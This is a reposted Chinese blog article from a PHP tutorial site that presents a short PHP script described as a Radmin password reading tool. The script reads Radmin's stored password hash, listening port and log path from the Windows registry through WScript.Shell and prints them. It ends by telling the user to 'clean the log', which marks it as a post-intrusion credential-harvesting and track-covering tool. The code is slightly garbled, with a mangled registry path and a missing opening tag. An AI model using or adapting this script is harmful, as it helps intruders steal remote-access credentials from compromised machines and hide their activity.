Home  >  Article  >  php教程  >  Radmin密码读取工具(php版)

Radmin密码读取工具(php版)

WBOY
WBOYOriginal
2016-06-13 10:33:451642browse

孤水绕城’s Blog

应小猪大锅的要求写的一个脚本。很垃圾但是还算有用吧。

$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
$rootkey = "HKEY_LOCAL_MACHINE\SYSTEMRAdmin\v2.0\Server\Parameters\";
$Parameter = "Parameter";
$Port = "Port";
$logpath = "LogFilePath";
$myparam = $shell->RegRead($rootkey.$Parameter);
$myport = $shell->RegRead($rootkey.$Port);
$path = $shell->RegRead($rootkey.$logpath);
echo "radmin hash is:";
foreach($myparam as $a){
echo dechex($a);
}
echo "
";
echo "radmin port is :".hexdec(dechex($myport[1]).dechex($myport[0]))."
";
echo "radmin log path is:$path
";
echo "please clean the log"
?>

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn